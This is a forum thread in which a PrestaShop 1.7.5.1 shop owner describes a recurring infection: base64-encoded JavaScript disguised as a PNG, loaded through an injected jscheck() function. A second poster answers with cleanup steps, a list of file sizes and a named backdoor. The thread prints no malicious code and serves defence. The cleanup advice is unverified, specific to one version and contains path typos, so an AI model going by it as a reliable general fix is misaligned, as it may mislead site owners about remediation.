Prestashop 1.7.5.1 vulnerabilities still present - where do those come from?

[heyciao]

Hi everyone,

prestashop 1.7.5.1, php 7.3

I am in the process to migrate to prestashop 8.2 php 8.xx and mysql upgrade.

In the meantime, I have an issue in the website that is still running until the migration is completed.

I have found out that in /img directory appear a PNG image, usually something like GbhdU.png, arriving from nowhere.

And in /classes/controller FrontController.php and Controller.php get injected of some code, a function that is called jscheck($html,$p), where $p, at the end of the story is exactly that image, that in fact is a javascript code encoded base64.

Yes, I have simply opened that png whit notepad and decoded it base64.

And that is fine, I have searched the net, fixed the modules, upgrades, deleted the modules I do not use, I think I have done everything.

Some mysql cleaning too. (changed passwords of course, first thing).

I must say that the site is now really fast, the backend is really fast. That experience forced me to deep cleaning the site and I discovered that Prestashop was not heavy and dramatically slow even in the back end operation because of the old version, old php, old things.

It can run really fast and perform really good. It was a ton of dirty code injected and now clean.

I know how to clean it.

But here is the BIG question:

How it happen that everyday in random hour that PNG image/code appear always in /img and the two files get injected again and again?

I check, go clean it, everything is right, after 8-12 hours, it happen again.

Where this come from? I have asked the logs to see if there is some $post with strange urls, some injections.

I am not able to find the hole, the starting point.

I have compared all the files in all directories. I have updated all the modules.

I have deleted all the phpunits. Installed all the modules that check the vulnerabilities.

It's a bot? It's a trigger coming from some SQL injected in some table?

It would be great to end this journey with the last discover: the origin.

Thanks to anyone would get interested and help.

 

 

 

 

 

 

[PSLine]

For those who may have a similar problem

I encountered a similar problem with PS 1.7.6.1, and it wasted more than six days of my life trying to solve it. Here is the solution to this problem:

First, you need to delete lines 43 to 46 of the file "smarty.config.inc.php." Then, delete the "js" folder and replace it with a clean one, as this folder contains the Chopper.GG!dha backdoor.

After that, check the list of files below with their corresponding file sizes. If you see that your file sizes are larger than the listed ones, you need to replace them with clean copies.

Public html/classess/tools.php     >>>> 143.14KB

Public html/classess/dispatcher.php >>>>42.78KB

Classess/controller/controller.php  >>>>21.55KB

Classess/controller/frontcontroller.php >>>>69.01KB

Classess/controller/modulefrontcontroller.php >>>>3.65KB

Classess/shop/shop.php >>>>43.11KB

Controllers/front/indexcontroller.php >>>1.42KB

Classess/prestashopautoload.php >>>> 12.56KB

Classsess/store.php >>>> 6.32KB

Classess/hook.php >>>>34.31KB

Classess/product.php >>>>263.08KB

Config/config.inc.php >>>>9.8KB

Config/smarty.config.inc.php  >>>> 6.4KB  ___After deleting lines 43 to 46      

Classess/db/db.php   >>>> 25.58KB  

Controllers/admin/adminlogincontroller >>>> 18.83KB

And finally you can also set the permissions of the above-listed files to 444.